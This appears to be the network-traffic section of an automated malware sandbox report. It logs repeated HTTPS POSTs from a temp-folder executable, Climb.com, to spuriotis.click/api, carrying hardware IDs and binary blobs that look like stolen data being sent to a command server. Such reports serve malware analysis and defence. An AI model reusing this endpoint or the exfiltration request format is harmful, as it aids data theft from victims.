                                                                                                                                                                      Data Ascii: kkc1DAEX56tXznF9aOzrY5wI+oMkkJlIT85Dc5jAm0aRRnDfytfxKgRecXmrfKtmTprtE3VHCJjeD5AnH9ENkxHVO1MCUqPvhw1tPTn/fiMajTZPbgcZSs7O3KYbkI7XQRdk2pkAMiDDXCV+qOlrYM6a6cOhwlyOHR+WYktXXtDBAWTKncWyLxfL8W+7ebsjHQw9RGTDXQ4f0d9o39FJVkGIt52Mk2LvhhJu9Tx7P2MOB/gDpkwXAwpflPMS0Ej


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.449742172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:00 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=SZB9DPFP
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 18101
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:00 UTC15331OUTData Raw: 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 53 5a 42 39 44 50 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                                                                                      Data Ascii: --SZB9DPFPContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--SZB9DPFPContent-Disposition: form-data; name="pid"2--SZB9DPFPContent-Disposition: form-data; name="lid"5FwhVM--lll--SZB9DPFPContent-Dispositio
                                                                                                                                                                      2024-12-28 08:34:00 UTC2770OUTData Raw: 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d f6
                                                                                                                                                                      Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
                                                                                                                                                                      2024-12-28 08:34:01 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:01 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=o9g9qjnhfpvebnggaugkv7cdnc; expires=Wed, 23 Apr 2025 02:20:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CTkaqZ2%2BOYMhsqHkcTtshH02akTKLMNBWrYS6NiQde%2B%2FeRf01hXwH7speQn8kfrwjo51TqJaoVWZZ8sIrX6OnwAp3RbGWCHoxDMHjw%2F1OO2DthKzBDeVi%2BkxypaOtScZftw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f903571e8686a5e-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2075&rtt_var=811&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19052&delivery_rate=1322463&cwnd=186&unsent_bytes=0&cid=6c75fb1b8bd5b256&ts=999&x=0"
                                                                                                                                                                      2024-12-28 08:34:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-28 08:34:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.449743172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:02 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=BJ3R6HHLJRG3T2M
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8764
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:02 UTC8764OUTData Raw: 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 4a 33 52 36 48 48 4c 4a 52 47 33 54 32 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 42 4a 33 52 36 48 48
                                                                                                                                                                      Data Ascii: --BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="pid"2--BJ3R6HHLJRG3T2MContent-Disposition: form-data; name="lid"5FwhVM--lll--BJ3R6HH
                                                                                                                                                                      2024-12-28 08:34:03 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:03 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=mvg0hehu8hi9dp1csf3e3ottgo; expires=Wed, 23 Apr 2025 02:20:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85W3k1WzOUgjjdYb2m9dozxdCEH6IOa2Eygi%2F41M4j7q6N5mAW8%2BmfeBipCyhqqwiF3Enq1KzvfbUTu2CURFsZUTMVkO3ssEqdefwu%2FHmEDoZU2SMMxINXFb3vtMVj2MP48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f90358099a97ce8-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=685&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9699&delivery_rate=1587819&cwnd=200&unsent_bytes=0&cid=1ab3091519753ded&ts=925&x=0"
                                                                                                                                                                      2024-12-28 08:34:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-28 08:34:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.449744172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:05 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=CFC8QXO2IQ469U639D6
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 20441
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:05 UTC15331OUTData Raw: 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 46 43 38 51 58 4f 32 49 51 34 36 39 55 36 33 39 44 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c
                                                                                                                                                                      Data Ascii: --CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="pid"3--CFC8QXO2IQ469U639D6Content-Disposition: form-data; name="lid"5FwhVM--ll
                                                                                                                                                                      2024-12-28 08:34:05 UTC5110OUTData Raw: 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3
                                                                                                                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`a
                                                                                                                                                                      2024-12-28 08:34:06 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:06 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=5t2ju389c5t4ud36q7sovtchaj; expires=Wed, 23 Apr 2025 02:20:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FzxsVfq4hMlnPFvI0Sm7a0fvWuLTv1UyvuWoL%2FpWYrMpz4ncbWSw8ALsCKVhYFQWnzQYVM2sfBgoDXz6PPKxSNmNgboZlFFFwg51TPT%2BjM4BSSx8IybPTzBXBprGskqi6rs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f90358fe84e4381-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1684&rtt_var=645&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21403&delivery_rate=1677197&cwnd=211&unsent_bytes=0&cid=300de297a0f9126b&ts=944&x=0"
                                                                                                                                                                      2024-12-28 08:34:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-28 08:34:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.449745172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:07 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=9HK79OX2B6X1K0XFSJN
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 1261
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:07 UTC1261OUTData Raw: 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 48 4b 37 39 4f 58 32 42 36 58 31 4b 30 58 46 53 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c
                                                                                                                                                                      Data Ascii: --9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="pid"1--9HK79OX2B6X1K0XFSJNContent-Disposition: form-data; name="lid"5FwhVM--ll
                                                                                                                                                                      2024-12-28 08:34:08 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:34:08 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=e24r3hd2vidcpd3do3r19r4rg3; expires=Wed, 23 Apr 2025 02:20:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZEUa2ctyIBaTrCwrkhw0W%2B47NkxIV%2BeF2eLqVMxyZzQoz6P24uyzdBM%2BoF%2Bl30hDNqsJ7QmQp4qTrEWaSqri9xn4ts8bm%2BxD0tc1G48OI2TGkra0ia4cqsJ9r8mu8Sxwyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f90359eddc08c24-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2017&rtt_var=758&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2178&delivery_rate=1447694&cwnd=141&unsent_bytes=0&cid=ea974e182bbcc378&ts=851&x=0"
                                                                                                                                                                      2024-12-28 08:34:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-28 08:34:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.449747172.67.128.1844438000C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-28 08:34:09 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=5M3LFGFBW5
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 550233
                                                                                                                                                                      Host: spuriotis.click
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 35 4d 33 4c 46 47 46 42 57 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                      Data Ascii: --5M3LFGFBW5Content-Disposition: form-data; name="hwid"8D2CD024D926098DD9AC212D15D33917--5M3LFGFBW5Content-Disposition: form-data; name="pid"1--5M3LFGFBW5Content-Disposition: form-data; name="lid"5FwhVM--lll--5M3LFGFBW5Content-Di
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 0c 78 92 63 62 fd 7f 2e 23 ec ab 00 9a b8 9c 9b 6d f1 97 01 db 27 f9 e8 34 b6 82 98 e9 02 dd d3 58 20 76 45 1d 56 ca 27 24 87 f8 16 9c 75 16 14 08 90 26 ae df 18 3f 11 27 40 9b 2f 56 9f 8a bf 13 6e b7 11 11 70 2c 6c 2f c3 e8 0f 21 5b 67 e7 83 28 e3 20 bc 3e 28 e9 08 f2 9f cc 83 e0 6c a8 52 0a 7f a4 19 2e dc 0f 1c b4 3a 01 b9 9a e7 2d 88 54 df b8 b4 28 70 e3 df 96 8f 03 2e 7d 63 7d ef d2 46 ec 87 9c de a1 43 35 eb 37 ae 52 a1 02 fb 8a 0e 93 92 ab 89 21 ae 93 69 51 28 b8 77 bf 8f 88 11 26 14 99 76 62 68 5a 0e 06 24 f9 c7 53 73 41 71 b0 a3 cb 9a 43 83 06 7e 3a 60 e9 e0 fb 3e 3d b0 dd 58 7e f7 cd a9 d1 c1 8b bb fb bd 6f 9c ec 95 ee 9d 1c 53 b4 7f eb 50 52 95 fd c6 a6 a2 e0 bf 8b 69 b3 87 ff 01 5a 55 a1 1f bc 05 81 91 86 e8 f8 36 7d fc 16 90 36 ab bf c4 ba bd
                                                                                                                                                                      Data Ascii: xcb.#m'4X vEV'$u&?'@/Vnp,l/![g( >(lR.:-T(p.}c}FC57R!iQ(w&vbhZ$SsAqC~:`>=X~oSPRiZU6}6
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: df 3f 8e c7 95 8d 4e 4e 4f 47 d7 e9 4f 28 39 ab 80 9d 8e 11 10 41 6e 1f 9e 6a 19 48 54 51 52 8c 88 fb f5 fe c4 31 f9 48 03 a7 2e 43 9c df 71 15 3e 3f 5e be 5a 57 07 f7 a8 b1 ec d7 bb 0c 02 ff 5d 35 eb 69 81 57 25 3c 3c 9a 9f 47 3c 16 cd 2f b4 a6 d4 b7 24 b4 b3 49 4e fb d5 46 ed a3 38 82 1c 4a 68 0f ce e4 a1 ee 92 78 a5 ca 2b c1 d4 96 3b a1 b5 7b f2 27 e5 fa f9 bf ab 67 4d 5e 19 fd 7d 36 fa 6a 7a c8 3e be bb 41 a2 7d d4 66 c3 e7 8d d1 b0 bf f8 2f c5 da a9 10 7e f4 4f 66 f7 ba d3 15 bf 47 99 86 88 ce 2c d1 ac dc 16 59 a1 f5 e1 d8 63 43 50 77 d4 96 c8 d3 1d 05 2a e9 2c e5 09 5e ba 48 86 c4 0b 76 b0 68 ba 18 73 7c 73 96 db fd 9e a3 df 6a 82 f7 d0 ff b5 c3 b4 b5 93 fe a0 04 e2 5f 94 5d bc 3e 6f 33 12 29 40 38 1a 6a 43 b9 92 af 31 a0 c7 ef 27 4d 1c 93 7a 66 05
                                                                                                                                                                      Data Ascii: ?NNOGO(9AnjHTQR1H.Cq>?^ZW]5iW%<<G</$INF8Jhx+;{'gM^}6jz>A}f/~OfG,YcCPw*,^Hvhs|sj_]>o3)@8jC1'Mzf
                                                                                                                                                                      2024-12-28 08:34:09 UTC15331OUTData Raw: 3d 99 15 9f 47 6a 2a 5e fe c3 62 72 f3 63 4f 57 4f ad fc 71 62 52 9b cf 09 75 8d fd dc fa 4d f5 35 76 b7 79 c5 b9 f6 69 7f 26 35 6f 2f 70 14 2e 02 98 5b a7 81 e3 85 1d 3c 3b 75 7a 65 0b 85 59 6e c3 12 ac d2 03 6d 1c 8e 3a 3e dc e6 eb fa a3 7b 11 56 13 72 93 05 d2 40 36 26 e4 96 d7 3c 44 b7 0b b5 37 f8 a0 8e 9f e9 7d 43 6e 33 79 1a 6e a1 05 1c 3e fe da 40 7c 84 29 f0 90 ff ff 8e 40 47 32 47 21 50 86 86 9a 0c c0 b5 b2 5c 44 64 49 44 6a 96 a2 c0 85 90 a7 da 7c 6b 74 71 55 ec ab 57 8a 43 5a 3f 00 61 0f d1 11 f3 0c 4b fc 32 e9 ea c1 0d 2c 7e 62 18 a5 82 02 89 1f 39 21 36 11 36 89 a1 86 4d 56 a5 41 b4 f1 d9 c6 05 57 03 d6 5d ba eb 8d 9b c6 bd 33 86 6b 7d c4 98 c8 c1 1c 01 fa 19 19 18 4d f0 39 eb c2 ad 51 a0 3a 9b 33 90 54 40 ab e8 76 d5 42 17 e5 1e fe 0c 88 cf
                                                                                                                                                                      Data Ascii: =Gj*^brcOWOqbRuM5vyi&5o/p.[<;uzeYnm:>{Vr@6&<D7}Cn3yn>@|)@G2G!P\DdIDj|ktqUWCZ?aK2,~b9!66MVAW]3k}M9Q:3T@vB
